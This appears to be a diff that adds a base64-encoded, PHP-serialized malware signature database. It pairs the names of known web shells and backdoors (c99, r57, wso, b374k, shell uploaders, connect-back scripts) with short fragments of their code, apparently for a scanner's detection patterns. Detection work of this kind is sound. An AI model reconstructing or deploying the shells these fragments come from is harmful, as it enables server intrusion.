+SUNSMWNtd2dLU0FwTyI7czoxNToicGJvdFsxXVswXVtwaHBdIjtzOjY0OiJQRDl3YUhBZ2FXWW9h +WE56WlhRb0pGOVNSVkZWUlZOVVd5SmpiMjF0Wlc1MElsMHBLU0I3SUdWMllXd29ZbUZ6IjtzOjE1 +OiJjbWRbMjNdWzBdW3BocF0iO3M6NjQ6Imw2WlFvZ0lDQWdJQ0FnSUhWcGJuUWdia1JsWm1GMWJI +UlVhVzFsVDNWMExBa0pDUWtKQ1M4dklIUnBiV1V0YjMiO3M6MjA6Imluc29tbmlhWzBdWzBdW2Fz +cHhdIjtzOjY0OiJZakk1Y21GWFZXOUpibHB3WXpKc01HTjVTWE5LU0Zwd1l6SnNNRmt5T1RGaWJs +RndUM2R2ZGt4NVFUTmhSRkoxIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi +QklZWFpsYm1GeVpDQXRMVDROQ2p3aExTMGdUVzlrYVdacFpXUWdkRzhnZDI5eWF5QjNhWFJvSURR +NE5ETndhSCI7czoxNToiY21kWzIxXVswXVtwaHBdIjtzOjY0OiI2WlQwaUlDWWdabWtyTXlBbUlD +SWdjM1I1YkdVOUlpSmlZV05yWjNKdmRXNWtMV052Ykc5eU9pQnlaMklvTkRnIjtzOjE3OiJhc3B5 +ZHJ2WzBdWzBdW3ZiXSI7czo2NDoiRlNZa295VG5SYVEyUmtVRlF3YVZwdVVuZFlNbHB3WWtkV1pt +UllRV2xMVTBGblNVaHpaMUZIV2pCalJqbDNaRiI7czoyMDoiOTUxMDc4YmlKWzBdWzBdW3BocF0i +O3M6NjQ6InRCUWxwNFFVaG1OazVKTVZSMlUyMDJiMFI0U2xvd1EyTTVibFpITlhCcWVHMDFXRGxh +UkdFeVVVTkZXR0VyVkUiO3M6MjA6InBocHNoZWxsWzE1XVswXVtwaHBdIjtzOjY0OiJDQmpiMnh2 +Y2oxbmNtVmxiajRrWkM4a1pHVnNYMllnUkVWTVJWUkZSQ0U4TDJadmJuUStQQzlpUGcwS1BHSnlQ +IjtzOjE4OiJuc3R2aWV3WzBdWzBdW3BocF0iO3M6NjQ6Ilcxd0xuTnhiQ0lwT3cwS0lDQWdJQ0Fn +SUNCb1pXRmtaWElvSWtOdmJuUmxiblF0Vkhsd1pUb2dkR1Y0ZEM5d2IiO3M6MjA6ImZpbGVzbWFu +WzEyXVswXVtwaHBdIjtzOjY0OiJ0TFMwdExTMHRMUzB0TFMwdExTMHRMUXB6ZFdJZ1JHOTNibXh2 +WVdSR2FXeGxDbnNLQ1NNZ2FXWWdibThnWm1sIjtzOjIwOiJ1bml0eHNoZWxsWzBdWzBdW3BsXSI7 +czo2NDoiWkhZWEpRWm5KbE9YQTVLMmhSVm5WTlZUTjFWbWgyTkdWVU56SnlVa2xMU1hwTkwxTkll +RVk0ZVRkc1F6bExaVCI7czoxNzoicGhwc3B5WzJdWzBdW3BocF0iO3M6NjQ6IkFnSUR3dmRISStE +UW9nSUNBZ0lDQWdJRHd2ZEdGaWJHVStEUW9nSUNBZ0lDQWdJRHgwWlhoMFlYSmxZU0J1WVciO3M6 +MjM6ImFudGlzZWNzaGVsbFsyXVswXVtwaHBdIjtzOjU2OiJhSFIwY0Rvdkx6azFMakUyT0M0eE9U +RXVNVEUyTDBkbGRFeHBibXR6TG1GemFIZy9hRzl6ZEQwPSI7czoxOToiZ2V0bGlua3NbMF1bMV1b +cGhwXSI7czo2NDoiYVc0Z1hDSmJKVEpkWENJNlhHNWJKVEZkSWl3S0owdHZjSGxoYkdGZlptbHNa +WE1uSUQwK0lDZERiM0JwYnlCeCI7czoxOToiaW1oYXBmdHBbMF1bMF1bcGhwXSI7czo2NDoiNkwy +RndjSE5sY25ZdmQzZDNMM05vWld4c2N5OGlQZ29nSUNBZ0lDQWdJRHhtYjI1MElHTnZiRzl5UFNJ +alJFTiI7czoyMzoic3RyZXNzYnlwYXNzWzBdWzBdW3BocF0iO3M6NjQ6IjBnYzNwRFRVUXNJSE42 +VkdWdGNFWnBiR1VLQ2s5dUlFVnljbTl5SUZKbGMzVnRaU0JPWlhoMENnb25JQzB0SUciO3M6MTQ6 +ImNtZFsxXVswXVthc3BdIjtzOjY0OiI5dGJXRnVaRG9nUEdsdWNIVjBJRzVoYldVZ1BTQW5ZMjFr +Sno1Y2JpSTdEUW9nSUNBZ0lDQWdJQ0JsWTJodklDIjtzOjIwOiJkYXJrc2hlbGxbMF1bMF1bcGhw +XSI7czo3OiJ2ZXJzaW9uIjtzOjEwOiIxNDA1Njc0OTQ3IjtzOjY0OiJpY3ZjSFZpYkdsalgyaDBi +V3d2YVc1akwyTnZibVpwWnk1cGJtTXVjR2h3Snl3a2RYTmxjaTRuTFRNekxuUjRkIjtzOjIwOiJj +b25maWdzcHlbMV1bMF1bcGhwXSI7czo2NDoiVkRCTlJqaEVhM054Y1ZKalZsQnZUMUZrVW0xaGNX +YzNlRXh2ZUdNclMxRkxVSEUzTjNwNk9WQmllSGxXWWxkTSI7czoxNToiaXNrb1swXVswXVtwaHBd +IjtzOjY0OiJ0WlNnZ0pGOUdTVXhGVTFzbmRYQnNiMkZrWldSbWFXeGxKMTFiSjI1aGJXVW5YU2tn +YjNJZ1pHbGxLQ1JsY25KIjtzOjI1OiJwaHBmaWxlbWFuYWdlcls0XVswXVtwaHBdIjtzOjY0OiJJ +RzVoYldVOVhDSmZZMjFrWENJZ2RtRnNkV1U5WENJaUxpUmpkWEp5Wlc1MFEwMUVMaUpjSWo0OEwz +UmtQaUk3IjtzOjE2OiJ3b3JzZVswXVswXVtwaHBdIjtzOjY0OiJmWkhWdGNDazdDbVZzYzJVS2V3 +cHBaaWdoSkhSdlgyWnBiR1VwQ25zS2FHVmhaR1Z5S0NkRGIyNTBaVzUwTFZSIjtzOjE1OiJ6YWNv +WzBdWzBdW3BocF0iO3M6NjQ6Im5JZ0x6NGlPaWNuS1M0aVBDOTBaRDRpT3cwS0lDQWdmUTBLSUNB +Z0pITnhiR1J5TGowaVBDOTBjajVjYmlJN0QiO3M6MTY6Im15c3FsWzZdWzJdW3BocF0iO3M6NjQ6 +IlRHUkRlVXNOQ2xWUlJtdG9ZbUkyVHpoa00zUXlMek5xVWxSS0wwbHhVM2REUVVsclJWcEJSVE5p +TVdKQ2RUWTQiO3M6MjQ6InNlcnZlcl9jb25maWdbMF1bMF1bcGhwXSI7czo2NDoiUnNaVDROQ2lB +OGMzUjViR1UrRFFvZ0lDQjBaQ0I3RFFvZ0lDQm1iMjUwTFdaaGJXbHNlVG9nZG1WeVpHRnVZUyI7 +czoxODoiY3J5c3RhbFsyXVswXVtwaHBdIjtzOjY0OiJCak9UbHdhSEJwWTNFdWNHaHdJRDhnYUhS +MGNEb3ZMMk5qZEdWaGJTNXVkV3RzWlc5dUxuVnpEUW9qSXlNakl5IjtzOjE1OiJjOTlbMjldWzBd +W3BocF0iO3M6NjQ6ImdKeUFnUm1sc1pUb2dJQ0FnUTIxa1FYTndMbUZ6Y0EwS0lDQW5JQ0JCZFhS +b2IzSTZJQ0JOWVdObGJ5QThiV0YiO3M6MTU6ImNtZFsxNl1bMF1bYXNwXSI7czo2NDoiYVUxTlEy +RjZheTgxTjBGbGJuVjBiamRXVGxOa2FVRlVTWGxOTDNob2VrNTJZemt5WlRGMVJWZzJVMDkzTkhr +MCI7czoyNzoiYWhsaXN5dXJnYV9zaGVsbFswXVswXVtwaHBdIjtzOjY0OiI0a2MzUnlLVHNOQ2dr +SkNRa0pZbkpsWVdzN0RRb0pDUWtKWTJGelpTQW5iWGx6Y1d3bk9nMEtDUWtKQ1FseVpYIjtzOjE0 +OiJ3c29bMF1bMF1bcGhwXSI7czo2NDoiYVV0VFFuWmphVUo2WkVoS2NHTXpVbmxMUTFKNVdsZGFi +R050Vm5sTVEwb3pXbGRLYUdKSVVtaEphV3RuWWpOSiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTVd +WzBdW3BocF0iO3M6MTM1OiI1YjE5ZnhxMzBqRDhkL3dwNUMybkN3M0dnSk9jMURiRWlXTW5UaE03 +OVV1U0pzNU5GMWhnNjRXbHU0dXhtK1B2ZnMrTVhsYmFGOEJwejNYZHorOXhHeHVrMFdqME5ock5q +RWFsWHVBSElXc3g2NGYrNExHMXMxYnF1d05uNXNlZFdlUjJuRCsiO3M6MTQ6Indzb1s1XVswXVtw +aHBdIjtzOjY0OiJpOHZWVzUwZFdzZ2IzQjBhVzFoYkdsellYTnBJSFZyZFhKaGJpQmtZVzRnYTJW +alpYQmhkR0Z1TGdva2FXMW5aIjtzOjE4OiJiYXRhdmk0WzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNB +Z0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdSMWNESW9hVzV6 +YjIiO3M6MTk6ImJsaW5kc2hlbGxbMF1bMF1bY10iO3M6NjQ6ImJXVWdMbWgwY0dGemMzZGtJajRO +Q2drSlptbHVaQ0JoYkd3Z0xtaDBjR0Z6YzNka0lHWnBiR1Z6UEM5dmNIUnAiO3M6MTg6ImNyeXN0 +YWxbMV1bMF1bcGhwXSI7czo2NDoiRVJSYjBwRFVXdEtRMVJXYW1GRVNXZGhTRkowWWtoT2QwNVhU +VEJOVjNocVlVUkdlV041YUVGYWJra3hUVmRSYiI7czoxODoicjNsYXBzM1swXVswXVtwaHBdIjtz +OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSkhaMklEMGdabUZzYzJVN0NpQWdJQ0FnSUNBZ0lDQWdJQ0Fn +SUNBZ0lDQWdJQ0FnIjtzOjE5OiJ3M2RzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJsWUt5OXRjVVE0 +YjJGVmFsaHdiekJOVGswM1pWVXJNalk0UnpkV09GcDBVa1J1YUZweFNEUkNOR1ZMVTNRMFpGIjtz +OjE2OiJiMzc0a1s2XVswXVtwaHBdIjtzOjY0OiJWd3BsWVdnMFF6VkxkVWR0YUUweGJWZzBiSGhL +VWtvM1JERlNkM296VmxsdVJGQklZazVzV1hJNVZ5dHhRblpXIjtzOjE2OiJiMzc0a1s0XVswXVtw +aHBdIjtzOjY0OiJkQ0k3THk5bWIzSnRZWFJ2RFFva1NHRjRjR3h2Y21WeVgyRmtaSEk5SkhKbGJX +OTBaVjloWkdSeUxpSjBiMjlzIjtzOjI0OiJhbGJhbmlhbnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6 +InNnWlhocGREc2dmU0JsYkhObElIc05DZ2tKSm5SNWNHVW9KR05vWVc0c0pHSjFaeXdrWkc5eWF5 +d2lSR1ZOYjMiO3M6MTk6Imhvc3RkZXZpbFswXVswXVtwbF0iO3M6NjQ6ImhiSE5sS1NCN0RRb0pD +UWtKYVdZZ0tDUm1JQ0U5SUNjdUp5QW1KaUFrWmlBaFBTQW5MaTRuSUNZbUlDRmtaV3ciO3M6MjI6 +IjQyMDUzMnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IjFwY1hRcmVFUm1Tek5CVFRkeVlXMTVRa1pT +VFVWNllrOUtVakJDVnpKbmRqaHRia3g1Ymtod0szQm5VV05LYzAiO3M6MjQ6InNlcnZlcl9jb25m +aWdbMV1bMF1bcGhwXSI7czo2NDoiWVdsc09qd3ZabTl1ZEQ0OEwyUnBkajQ4TDNSa1BnMEtDUWtK +UEhSa0lIZHBaSFJvUFNJeE9DVWlQanhtYjI1MCI7czoyMToicGhwX21haWxlclswXVsxXVtwaHBd +IjtzOjY0OiJKNUlIUnl4ckRodTV0aklHdG9hU0JpNGJxdmRDREVrZUc2cDNVZ1orRzdyV2tnZEds +dUlHNW80YnF2YmlCcjRiIjtzOjI2OiJzaGVsbF91cGxvYWRlclsxMV1bMF1bcGhwXSI7czo2NDoi +YlhCc1pYUmxJR0ZtZEdWeU9pQjdKR1Y0WldOZmRHbHRaWDBnYzJWamIyNWtjMXh1SWpzTkNnMEtm +UTBLRFFwbCI7czoyMToidWRwZmxvb2RlclswXVswXVtwaHBdIjtzOjY0OiIxSzBScU9FTTNialZH +TkZaYVZqVlpWR3hoY21wRGVXeGFSVGRsY2pFelJIUktabEV4Y21sVlVuSmtiV1JZZUdwIjtzOjIw +OiJlZ3lzcGlkZXJbMF1bMF1bcGhwXSI7czo2NDoiV1VpT3cwS0NRa0pmUTBLQ1FrSmFXWW9JV2x6 +WDJGeWNtRjVLQ1JwYm1SbGVGc2thMjVoYldWZEtTa2dldzBLQyI7czoyMjoiNjI5Nzg4dHJ5YWdb +MF1bMF1bcGhwXSI7czo2NDoiQWRBRDkvMVVBUUFBakFFQUFKZ0JwQUZjQVhnQTZBRU1BVGdCeUFH +TUFjZ0JJQUdvQS9mODdBQ0FBV1FCTEFGYyI7czoxNjoiZWZzbzJbMV1bMF1bYXNwXSI7czo2NDoi +bFBWd2lkR1Y0ZEZ3aUlHNWhiV1U5WENKaFkzUmhjbU5pZFdabVgzQmhkR2hjSWlCMllXeDFaVDFj +SW5sNFgyRiI7czoxNToiYzk5WzIxXVswXVtwaHBdIjtzOjY0OiJnSUNBZ0lDQWdJQ0FnSUNJZ0lD +QWdJQ0FnSUNBZ0lDQWdabUYwWVd3b1hDSlZibUZpYkdVZ2RHOGdZMmhoYm1kIjtzOjIwOiJwaGFu +dGFzbWFbMF1bMF1bcGhwXSI7czo2NDoiblp1TkdaaGVHVlpXVkIwTlcxV1RUQm9ZV3hOYmpGd1Ft +YzJReTlPU0ZKV1lqWXhaRkZJTkhsUlRuQnNTRm8wZCI7czoxNzoiYjM3NGtbMTJdWzBdW3BocF0i +O3M6NjQ6IlNJcE93MEtEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdVM1J5WldGdFEyOXVibVZqZEc5 +eUlHOTFkSEIxZEVOdmIiO3M6MjE6ImpzcHJldmVyc2VbMF1bMF1banNwXSI7czo2NDoiZlFwbGJI +TmxhV1lnS0Nna2JXOWtaU0FtSURCNE5qQXdNQ2tnUFQwOUlEQjROakF3TUNrZ2V5UjBJRDBnSW1J +aSI7czoxNToiYzk5WzE5XVswXVtwaHBdIjtzOjY0OiJaWFpoYkNnaWFXWW9hWE56WlhRb1hDUmZV +a1ZSVlVWVFZGc25ZMmduWFNrZ0ppWWdLRzFrTlNoY0pGOVNSVkZWIjtzOjE0OiJjbWRbMF1bMF1b +cGhwXSI7czo2NDoiK0NqeGljajRLUEdsdWNIVjBJSFI1Y0dVOVZFVllWQ0J1WVcxbFBTSXRZMjFr +SWlCemFYcGxQVFkwSUhaaGJIViI7czoxNDoiY21kWzNdWzBdW3BocF0iO3M6NjQ6ImdJQ0FnSUds +bUlDaDFibXhwYm1zb0pHWnBiR1VwS1hzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1ki +O3M6MjU6InBocGZpbGVtYW5hZ2VyWzFdWzJdW3BocF0iO3M6NjQ6InBhMkV1ZDNKcGRHVWdJa052 +Ym5OMElHRmtVMkYyWlVOeVpXRjBaVTkyWlhKWGNtbDBaU0E5SURJaUlDWWdkbUoiO3M6MTU6ImFq +YW5bMF1bMF1bYXNwXSI7czo2NDoiSUM0aUlFZENJanNnZlEwS0lDQWdJR1ZzYzJWcFppQW9JQ1J6 +YVhwbElENDlJREV3TkRnMU56WWdLU0I3SUNSeiI7czoxOToiaXBheXM3NzdbMV1bMF1bcGhwXSI7 +czo2NDoieGlZWEl0WkdGeWEzTm9ZV1J2ZHkxamIyeHZjam9nYzJsc2RtVnlPd29nSUNBZ0lDQWdJ +Q0FnSUNCelkzSnZiRyI7czoxOToic2FmZW1vZGVbMV1bMF1bcGhwXSI7czo2NDoiSUNNZ0lDQWdJ +eU1OQ2k4cUlDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZyI7 +czoxNToicjU3WzIwXVswXVtwaHBdIjtzOjY0OiJVMjEzVnpSS2JGTkZUMGxrWWpoR2EwbFRLMU14 +VFZWMVUxZHRjVGx4VkdvMk1VSnNPSFJUWkZrd01XNHpZM3A2IjtzOjI1OiJzaGVsbF91cGxvYWRl +clsxXVswXVtwaHBdIjtzOjY0OiJ5YzlQaWNtSXpFd05UYzdKaU14TURnMk95WWpNVEEzT1RzbUl6 +RXdOelk3SmlNeE1EY3lPeVlqTVRBNU1Ec21JIjtzOjE1OiJyNTdbMTddWzBdW3BocF0iO3M6NjQ6 +Im9nSUNBZ2ZRMEtJQ0FnZlEwS0lDQjlEUW9nSUNSb1pXRmtXeVJyWFNBOUlDSThZajRpTGlSb1pX +RmtXeVJyWFMiO3M6MTQ6ImM5OVs5XVswXVtwaHBdIjtzOjY0OiJTSXBPeUJsZUdsME95QjlDZ292 +TDAxaGFHdGxiV1VnUld0c1pXNTBhWE5wYm1VZ1dXRnJZV3hoYmlZak16QTFPIjtzOjE4OiJtYWhr +ZW1lWzBdWzBdW3BocF0iO3M6NjQ6InZibWMrQ2p4aVBqeDFQanhqWlc1MFpYSStQRDl3YUhBZ1pX +Tm9ieUFpVkdocGN5QnpaWEoyWlhJZ2FHRnpJR0oiO3M6MjA6InJvb3RzaGVsbFszXVswXVtwaHBd +IjtzOjY0OiJGaVl6VTFZamdpT3lBamNtOXZkQTBLSkdOdmJHOXlJRDBnSWlOa1pqVWlPdzBLSkdS +bFptRjFiSFJmWVdOMGFXIjtzOjIwOiJmaWxlc21hblsxMF1bMF1bcGhwXSI7czo2NDoiaGJEMGta +R2x5WDJGMGRXRnNKeXRoY21jckp5OG5PdzBLZlEwS1puVnVZM1JwYjI0Z2MyaHZkMTl1WVcxbGN5 +ZyI7czoyNToicGhwZmlsZW1hbmFnZXJbMF1bMl1bcGhwXSI7czo2NDoiV0V4RGFGVlhaak5KVGpS +UmMxRlRSVkk0YkN0MVdVZFFabkZxUTJkNVZqRldNRlIwWTFwUWRESlZNbmRHYVVsaiI7czoyMToi +Y2xlYXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJ3WVhOemQyUThMMjl3ZEdsdmJqNE5Danh2Y0hS +cGIyNGdkbUZzZFdVOUltNWxkSE4wWVhRZ0xXRnVJSHdnWjNKIjtzOjE4OiJsaXpvemltWzFdWzBd +W3BocF0iO3M6NjQ6InBPdzBLSUgwTkNpQnBaaWdrWDFCUFUxUmJKM0JoYzNNblhTQTlQU0FrY0dG +emMzZHZjbVFwRFFvZ2V3MEtJQ0EiO3M6MjA6Imlyb25zaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJZ +eloxa3JWblJSUTJGSlJWQmhjbHBsZGpkSk9USldRVE5uUzFaMlpWRXdOamhyTTI1Q2RtTm5TREF5 +VEc5SlptIjtzOjIwOiJhbC1tYXJodW1bMF1bMF1bcGhwXSI7czo2NDoiSmtaWEk5TVQ0S0NqeDBj +aUJpWjJOdmJHOXlQV2R5WldWdVBqeDBaRDVrTUcxaGFXNXpQQzkwWkQ0OGRHUStkWCI7czoyMDoi +Y29uZmlnc3B5WzNdWzBdW3BocF0iO3M6NjQ6IkJvY0dKaUoxMHBLU0FLZXlBS1pXTm9ieUFpUEdO +bGJuUmxjajQ4ZEdGaWJHVWdZbTl5WkdWeVBUQWdkMmxrZEciO3M6MTg6ImxvbGlwb3BbMF1bMF1b +cGhwXSI7czo2NDoiVlVWVFZGc25aR2x5SjEwN0Nna0pKR1p1WVcxbFBTUklWRlJRWDFCUFUxUmZS +a2xNUlZOYkoyWnBiR1ZmYm1GdCI7czoyMjoicGhwYmFja2Rvb3JbMF1bMF1bcGhwXSI7czo2NDoi +SnlPREY0VXk5eFNFUmxlbk5KTDI0d09TOVFjRFpsWlZnNFdpOUxkbFE1U2lzdlpWcHlLMGQxWVRo +d2RrZHRaViI7czoyMjoiZGV2aWx6c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiYldWdWRDNWpjbVZo +ZEdWRmJHVnRaVzUwS0NKd2NtVWlLVHNOQ2w5aExuTjBlV3hsTG1ScGMzQnNZWGs5SW1sdSI7czoy +OToiYWpheF9jb21tYW5kX3NoZWxsWzFdWzBdW3BocF0iO3M6NjQ6ImNHVTlkR1Y0ZENJdVFDUmZV +RTlUVkZzblptbHNaU2RkTGlJK1BHSnlQaUk3Q21WamFHOGdJanhwYm5CMWRDQjAiO3M6MTc6Im5z +aGVsbFswXVswXVtwaHBdIjtzOjY0OiJHVmhaR1Z5SUM0OUlDSWtiV1Z6YzJGblpWeHlYRzRpT3cw +S0lDQWdJQ0FnU1dZZ0tDUm1hV3hsWDI1aGJXVXBJIjtzOjE1OiJzcGFtWzJdWzBdW3BocF0iO3M6 +NjQ6Ik1qRWdYRzRpT3lBS2ZTQUtkWE5sSUZOdlkydGxkRHNnQ25WelpTQkdhV3hsU0dGdVpHeGxP +eUFLYzI5amEyVjAiO3M6MjI6ImNvbm5lY3RiYWNrMlswXVswXVtwbF0iO3M6NjQ6InBPbmc2TDJj +cGV3b21iR2xzS0NReEtUc0tjSEpwYm5RZ1RWbEdTVXhGSUNReExpSXVkSGgwSUNJN0NtWnZjaWci +O3M6MTc6Imtpbmc1MTFbMF1bMF1bcGxdIjtzOjY0OiJDZ2tKSUdsbUlDaHpkSEl1YVc1a1pYaFBa +aWhrYjNRc0tHeGhkQ3N5S1NrOVBTMHhLWHNLQ2drSklDQWdJR0ZzIjtzOjM2OiJjcmlzdGVyY29y +cF9pbmZvY29sbGVjdG9yWzFdWzBdW3BocF0iO3M6NjQ6IlhoMFBTSWpOMkUzWXpka0lqNE5DaUFn +SUNBZ0lDQThaR2wySUdGc2FXZHVQU0pqWlc1MFpYSWlQZzBLSUNBZ0kiO3M6MTg6InRlYW1zcWxb +MV1bMF1bcGhwXSI7czo2NDoiQ0FnSUNBZ0lDQmpiMjUwWVdsdWFXNW5JR0VnWUM0bklHWnZiR3h2 +ZDJWa0lHSjVJRzkwYUdWeUlIUmxlSFFnYSI7czoxNToic210cGRbMF1bMV1bcHldIjtzOjY0OiJN +R1I2WVU4MWRFaGpNbXAxWWxJelRtODNiVEJrZW1FS1R6VjBTR015YW5WaVVqTk9iemR0TUdSNllV +ODFkRWhqIjtzOjE5OiJkYzNzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJna1gxQlBVMVJiSjJOdmJX +MWhibVFuWFNrN0RRcGxZMmh2SUNJOEwzUmxlSFJoY21WaFBpSTdEUXBsZUdsME93IjtzOjE5OiJk +YzNzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiIyVXVZMjl0Q2dvZ0lFTnZjSGx5YVdkb2RDQW9ZeWtn +TWpBd015QnZjME52YlcxbGNtTmxDZ29nSUZKbGJHVmhjIjtzOjE1OiJjbWRbMzRdWzBdW3BocF0i +O3M6MTM4OiJrMXBlR3d5UVVwaVRXUmxVMDVMZGt3MVFXOWhiemczVDNwemVuVXhkRFkwV2xSR09X +VktkVFJKTlZWQ04wbHBNRzlwSzBFME1VMVBUMEZKTjNreFRWWlZRbFkzV0dkSVRrWjNkVGRwYnpr +NGNXZElNME5CTm5SbGMxSTJUWFZKU0hJMGNTOVNNVkUiO3M6MTY6InB6YWR2WzBdWzFdW3BocF0i +O3M6NjQ6IkY0TkUxcVJrOVlTR2Q2V1ZaNE5FMUhVbU5sUkVVeFdFaG5kMWxzZURSTlYxWmpaVVJC +TWs1RVdtTmxSRWwzV0UiO3M6MjI6Impvb21sYV9zcGFtWzJdWzFdW3BocF0iO3M6NjQ6ImFXNGdZ +Mjl1Wm1sbkxpb2dabWxzWlhNdUxpNWNibHh1SWpzZ0RRcG1iM0psWVdOb0lDZ2tkWE5sY25NZ1lY +TWciO3M6MTQ6Ik8wT1swXVswXVtwaHBdIjtzOjY0OiJtVjNJRk5vWld4c0lFSjVJQzR2VFVONVlt +VnlUR2x1YTE5UWIzSjBNaklwSUNvdklBMEtKR0YxZEdoZmNHRnpjIjtzOjIwOiJwaHBzaGVsbFsz +NV1bMF1bcGhwXSI7czo2NDoiQ2drWkdseUxpSXZJaTRrWkdsemJXa3lMQ1JtYVd4bGNHVnliU2tn +UHlBaVBHWnZiblFnWTI5c2IzSTlKeU13TSI7czoxNzoiYVpSYWlMWzBdWzBdW3BocF0iO3M6NjQ6 +IldDMXZJRFl0YnlCWUxXOGdUeTF2SUV3dGJ5QmxMVzhnZUMxdklGSXRieUEwTFc4Z0t5MXZJRFl0 +YnlCVUxXOGciO3M6MTU6ImM5OVsxNl1bMF1bcGhwXSI7czo2NDoiM1IzWnphbWhXYjBOWGRWVXph +bU5tTlhoSVNXVldSMlpoTkRsYVZURlVVbFJOTXpWdVZXeEVhV1oxZUVaalNqUiI7czoyMDoic3R1 +bnNoZWxsWzJdWzBdW3BocF0iO3M6NjQ6IktJQ0FrUkVORGV5UmtZMk56YjJOcmZYdGllWFJsYzMw +Z1BTQWtZbmwwWlhNN0NpQWdKRVJEUTNza1pHTmpjMjkiO3M6MTc6InBlcmxib3RbMF1bMV1bcGxd +IjtzOjY0OiJ6SWl3aVFXeGhkbWtpTENKQmJHTnZjbTRpTENKQmJHUmhJaXdOQ2lKQmJHVnJjeUlz +SWtGc2JHbHpiMjRpTENKIjtzOjE4OiJoYXJhdWt1WzBdWzBdW3BocF0iO3M6NjQ6IkV0YWJERkti +R2NOQ2pWR00xVkRhbXhQWlVkb1dIcGtkMWxUVFRsdVVIcG5abHBqUkVwVlkyWlFXR2sxWWtGTU0i +O3M6MTc6ImIzNzRrWzExXVswXVtwaHBdIjtzOjY0OiJkSFJaVW1GQ1YybE1URlZ5U0hseFpITjVN +R0U1VUhSbkwyWXdUSEp4Tm5ad1VXWTBPR3czT0RJM1lYTlFlVmRTIjtzOjE0OiJjOTlbMV1bMF1b +cGhwXSI7czo2NDoiRXRhU0IxTFdrZ2VDMXBJRkF0YVNBMExXa2dNaTFwSUZRdGFTQktMV2tnVGkx +cElHUXRhU0IzTFdrZ01TMXBJSCI7czoxOToicGhwc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiSUdK +eVpXRnJPd3A5Q21sbUlDZ2hKR3hsYmlrZ2V3b0pJeUJYWlNCbVlXbHNaV1FnYjI0Z2RHaGxJRzFo +YVc0ZyI7czoyMToibWV0YXNwbG9pdFswXVswXVtwaHBdIjtzOjY0OiJEMGdiWGx6Y1d4ZmJHbHpk +RjlrWW5Nb0pITnhiRjl6YjJOcktUc05DaUFnSUdsbUlDZ2hKSEpsYzNWc2RDa2dlIjtzOjE1OiJj +MTAwWzBdWzBdW3BocF0iO3M6NjQ6Ik5vYnlBaVJtRnBiQ0k3Q2drSkNYSmxkSFZ5YmpzS0NRbDlD +Z2tKSkdOdmJDQTlJRzE1YzNGc1gyNTFiVjltYVciO3M6MTk6IndlYm15c3FsWzBdWzBdW3BocF0i +O3M6NjQ6IlpHVnpJSFpsYm1GdWRDQmtaU0JRU0ZBaU93cDlDZ3BwWmlna2IzQjBhVzl1SUQwOUlE +SXBld29nSUNBZ2NISnAiO3M6MTk6ImJhY2tkb29yWzJdWzBdW3BocF0iO3M6NjQ6ImJrcGlaRGty +TkhGelZqWmFXa1pRVjFSUllVSnNZMmsxUzJOSGFERTNXVTVRVG14Vk9DSXNJalZXUlVReldrdEUi +O3M6MTk6InBocHNoZWxsWzhdWzBdW3BocF0iO3M6NjQ6IlBEOXdhSEFOQ21sbUtDUmZVRTlUVkZz +aWNHRnpjeUpkSUQwOUlDSXlOak5qWkRkaFpUVXdOemhoT0RReFpUQXgiO3M6MTQ6ImNtZFs4XVsw +XVtwaHBdIjtzOjY0OiJSWFJ6VEd0MlkxZEdXV3R1TDFsUmIyOWFNVGRHYURCSVJHVk5XRkJqUlVK +VVdUZzNiMDgyV0dWSlNHdDFRbmxqIjtzOjE1OiJ3c29bMTldWzBdW3BocF0iO3M6NjQ6ImMzUWdQ +U0FuSWlJbk93b2dJSDBnWld4elpTQjdDaUFnSUNBa1pYTmpZWEJsWkNBOUlHRnljbUY1WDIxaGND +Z24iO3M6MTk6InNpbXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IkdWeWJYTTlKSFI1Y0dWYk1GMDdD +aUFrY0dWeWJYTXVQU2drYlc5a1pTQW1JREF3TkRBd0tTQS9JQ0p5SWlBNkkiO3M6MTQ6Imdmc1sw +XVswXVtwaHBdIjtzOjY0OiI3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdmUXA5Q2o4K0NqeGljajRLUEhS +bGVIUmhjbVZoSUc1aGJXVTlJbk5vWld4IjtzOjE4OiJteXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6 +IlFwR2IyeGtaWEpCZEhSeWFXSjFkR1Z6SUQwZ0lsTjVjM1JsYlN3Z1JHbHlaV04wYjNKNUlncGpZ +WE5sSURJeUkiO3M6MTg6Im50ZGFkZHlbMF1bMF1bYXNwXSI7czo2NDoiN0RRb2dJR1ZqYUc4Z0lr +WnNkWE5vWEc0aU93MEtJQ0JsWTJodklDSThkV3crWEc0aU93MEtJQ0JsWTJodklDSSI7czoxNjoi +bXlzcWxbN11bMF1bcGhwXSI7czo2NDoiMVJWTUU1RVRYcE9WRWw1V2tSYWJFOUVZek5OZWtFd1Qx +ZE9hVmt4YzJsYVdHaHNXVE5XTUZwVFNtUkpSREJuUyI7czoxODoidGRzaGVsbFsxXVswXVtwaHBd +IjtzOjY0OiJRMWd3VjFaRlZIVjZURE41VkUxNWNWRkhZVmRFU0ZOYVpVWlFPV1JHUjAwMmIzZDVN +WEpoWXpOQk0yTlNTbEZOIjtzOjE5OiJmaWxlc21hblsxXVswXVtwaHBdIjtzOjY0OiJkT1NFWlJN 